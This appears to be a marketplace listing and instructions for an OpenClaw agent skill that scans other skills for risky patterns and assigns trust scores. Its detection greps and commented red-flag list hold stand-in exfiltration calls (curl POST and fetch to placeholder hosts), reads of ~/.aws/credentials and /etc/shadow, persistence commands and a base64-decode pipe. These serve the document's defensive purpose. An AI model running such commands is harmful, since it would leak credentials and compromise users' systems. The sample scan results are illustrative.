Skill Security Scanner
by @steffano198
Scan OpenClaw skills for security risks, suspicious permissions, and provide a trust score to help evaluate skill safety before use or installation.
clawhub install skill-security-scannerπ About This Skill
name: skill-security-scanner description: Scan OpenClaw skills for security issues, suspicious permissions, and trust scoring. Use when: (1) Installing a new skill, (2) Auditing existing skills, (3) User asks if a skill is safe, (4) Before running untrusted skills. metadata: {"openclaw":{"emoji":"π"}}
Skill Security Scanner
Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score. Helps users make informed decisions about which skills to trust.
When to Use
Quick Reference
| Command | Purpose |
|---------|---------|
| scan-skill | Scan a single skill |
| scan-all | Scan all skills in workspace |
| trust-score | Get quick trust score (0-100) |
| list-permissions | List all requested permissions |
Scanning Strategy
1. Check Metadata (Frontmatter)
Look for:
bins - CLI tools skill needsenv - Environment variables (API keys, tokens)requires.config - Required config settingsrequires.bins - Binary dependenciesRed flags:
2. Analyze SKILL.md Content
Suspicious patterns to detect:
# Network calls to unknown domains
grep -E "(curl|wget|http|https).*\.com" SKILL.md
grep -E "fetch\(|axios\(" SKILL.mdFile system access beyond declared scope
grep -E "rm -rf|dd |mkfs" SKILL.mdCredential access
grep -E "password|secret|token|key" SKILL.mdExecution of downloaded code
grep -E "eval\(|exec\(|system\(" SKILL.mdBase64 encoded commands
grep -E "base64|-enc|-encode" SKILL.md
3. Trust Score Calculation
Score from 0-100 based on:
| Factor | Weight | Criteria | |--------|--------|----------| | Author reputation | 20% | Known author? Official OpenClaw skill? | | Permission scope | 30% | Minimal bins/envs? | | Code patterns | 25% | No suspicious commands | | Update frequency | 15% | Recently updated? | | Download count | 10% | Popular = more scrutiny |
4. Risk Levels
| Score | Risk | Action | |-------|------|--------| | 80-100 | π’ Low | Safe to use | | 60-79 | π‘ Medium | Review before use | | 40-59 | π High | Use with caution | | 0-39 | π΄ Critical | Don't use |
Output Format
Scan Result
π Skill:
ββββββββββββββββββββββββββββββββββ
π Trust Score: /100 ()π Permissions Requested:
β’ bins: curl, jq
β’ env: OPENWEATHER_API_KEY
β οΈ Issues Found:
1. [MEDIUM] Requests network access but no clear purpose
2. [LOW] No recent updates (6+ months)
β
Positive Signs:
β’ Official OpenClaw skill
β’ Clear documentation
Trust Report
Generate a full report:
## Security Analysis: Score: /100 ()
Permissions Analysis
| Type | Requested | Risk |
|------|-----------|------|
| bins | curl, jq | Low |
| env | API_KEY | Medium |Code Pattern Analysis
β
No suspicious execution patterns
β
No credential access attempts
β οΈ 2 network calls to external domains Recommendation
Common Red Flags
High Risk Patterns
1. Network exfiltration
# Example: sending data to unknown servers
# curl -X POST https://SUSPICIOUS-DOMAIN/exfil
# fetch("https://data-collector.DOMAIN")
2. Credential harvesting
# Example: reading credentials
# cat ~/.aws/credentials
# grep "password" /etc/shadow
3. Persistence mechanisms
# Example: auto-start, cron, systemd
# sudo crontab -l
# systemctl enable
4. Obfuscated code
# Example: base64 encoded commands
echo "c3VkbyByb20gL3J0ZiAv" | base64 -d
Medium Risk Patterns
1. Excessive permissions - More bins/envs than needed 2. No documentation - Unclear what skill does 3. Outdated - No updates in 6+ months 4. Third-party dependencies - Unknown npm/go packages
Green Flags
1. β Official OpenClaw skills (openclaw/skills) 2. β Clear, specific permissions 3. β Active maintenance (recent commits) 4. β Open source with clear code 5. β Known author with reputation
Workflows
Before Installing New Skill
# 1. Get skill path (ClawHub or local)
2. Run full scan
scan-skill /path/to/skill3. Check trust score
trust-score /path/to/skill4. Review issues
5. Decide: install / skip / investigate more
Regular Security Audit
# Weekly: scan all installed skills
scan-allMonthly: generate full report
Save to .learnings/ for documentation
Quick Trust Check
# For quick decision
trust-score If score < 60, do full scan
If score < 40, don't use
Integration with Other Skills
Best Practices
1. Always scan before installing untrusted skills
2. Document scan results in .learnings/
3. Share findings with community (anonymized)
4. Update trust scores when vulnerabilities found
5. Trust but verify - Don't rely solely on automated scanning
Examples
Example 1: Scanning Before Install
User wants to install "cool-new-skill" from ClawHub:
> scan-skill ./skills/cool-new-skillπ Scanning: cool-new-skill
ββββββββββββββββββββββββββββββββββ
π Trust Score: 72/100 (π‘ Medium)
π Permissions:
β’ bins: none
β’ env: none
β οΈ Issues:
β’ No recent updates (8 months)
β’ Unknown author
β
Positives:
β’ Clear documentation
β’ Minimal permissions
π‘ Recommendation: Safe to try, monitor usage
Example 2: Finding Malware
> scan-skill ./skills/suspicious-skillπ Scanning: suspicious-skill
ββββββββββββββββββββββββββββββββββ
π Trust Score: 23/100 (π΄ CRITICAL)
π Permissions:
β’ bins: curl, base64
β’ env: API_KEY, SECRET_TOKEN
π¨ CRITICAL ISSUES FOUND:
1. Network exfiltration pattern detected
2. Credential access attempt
3. Obfuscated commands (base64)
π Recommendation: DO NOT USE - Potential malware
Example 3: Audit Report
> scan-allπ Scanning all skills in ~/.openclaw/workspace/skills/
ββββββββββββββββββββββββββββββββββ
β
github: 95/100 (safe)
β οΈ todoist: 68/100 (review needed)
β
self-improving-agent: 92/100 (safe)
π΄ unknown-skill: 34/100 (remove recommended)
ββββββββββββββββββββββββββββββββββ
Summary: 2 safe, 1 review, 1 remove
Related
β‘ When to Use
π‘ Examples
Example 1: Scanning Before Install
User wants to install "cool-new-skill" from ClawHub:
> scan-skill ./skills/cool-new-skillπ Scanning: cool-new-skill
ββββββββββββββββββββββββββββββββββ
π Trust Score: 72/100 (π‘ Medium)
π Permissions:
β’ bins: none
β’ env: none
β οΈ Issues:
β’ No recent updates (8 months)
β’ Unknown author
β
Positives:
β’ Clear documentation
β’ Minimal permissions
π‘ Recommendation: Safe to try, monitor usage
Example 2: Finding Malware
> scan-skill ./skills/suspicious-skillπ Scanning: suspicious-skill
ββββββββββββββββββββββββββββββββββ
π Trust Score: 23/100 (π΄ CRITICAL)
π Permissions:
β’ bins: curl, base64
β’ env: API_KEY, SECRET_TOKEN
π¨ CRITICAL ISSUES FOUND:
1. Network exfiltration pattern detected
2. Credential access attempt
3. Obfuscated commands (base64)
π Recommendation: DO NOT USE - Potential malware
Example 3: Audit Report
> scan-allπ Scanning all skills in ~/.openclaw/workspace/skills/
ββββββββββββββββββββββββββββββββββ
β
github: 95/100 (safe)
β οΈ todoist: 68/100 (review needed)
β
self-improving-agent: 92/100 (safe)
π΄ unknown-skill: 34/100 (remove recommended)
ββββββββββββββββββββββββββββββββββ
Summary: 2 safe, 1 review, 1 remove
π Tips & Best Practices
1. Always scan before installing untrusted skills
2. Document scan results in .learnings/
3. Share findings with community (anonymized)
4. Update trust scores when vulnerabilities found
5. Trust but verify - Don't rely solely on automated scanning